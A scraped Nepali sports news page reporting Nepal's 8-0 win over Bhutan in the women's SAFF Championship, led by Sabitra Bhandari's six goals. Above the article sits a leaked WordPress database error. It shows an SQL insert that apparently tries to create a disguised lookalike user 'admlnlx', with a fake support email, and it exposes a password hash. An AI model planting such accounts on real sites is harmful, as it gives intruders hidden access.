WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B7XCyrsGngGM2zzHpjLVNSO8zrPdG71', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 11:05:28', '', 'admlnlx', 'admlnlx')
काठमाडौं ,पुस ११ –
भुटानमाथि फराकिलो जित हात पार्दै नेपालले महिला साफ च्याम्पियपनसिनमा शानदार सुरुवात गरेको छ ।
सोमबार भएको आफ्नो पहिलो खेलमा नेपालले साबित्रा भण्डारीको डबल हृयाट्रिकको मदतमा भुटानलाई ८-० गोल अन्तरले हराएको हो ।
भारतको सिलिगुडीमा भएको खेलमा नेपालले सुरुवाति ३५ मिनेटमा पाँच गोल गरेको थियो । पाँचौं मिनेटमा गोलको खाता खोलेकी साबित्राले ९ र २३ औं मिनेटमा गोल गर्दै हृयाट्रिक पुरा गरिन् ।
२६ औं मिनेटमा सर्मिला थापाले गोल गरिन् भने ३५ औं मिनेटमा साबित्राले व्यक्तिगत चौथो गोल गर्दा पहिलो हाफमा नेपाल ५-० ले अगाडि रहृयो ।
दोस्रो हाफमा भुटानले केही सम्हालिएर खेल्न खोज्यो । तर, ७२ औं मिनेटमा साबित्राले गोल गरिन् । पाँच मिनेटपछि नै दीपा अधिकारीको क्रममा गोल गर्दै साबित्राले डबल हृयाट्रिक पुरा गरिन् ।
खेलको अन्तिम मिनेटमा कृष्णा खत्रीले गोल गरेपछि नेपाल ८ -० को फराकिलो गोल अन्तरले विजयी भएको छ ।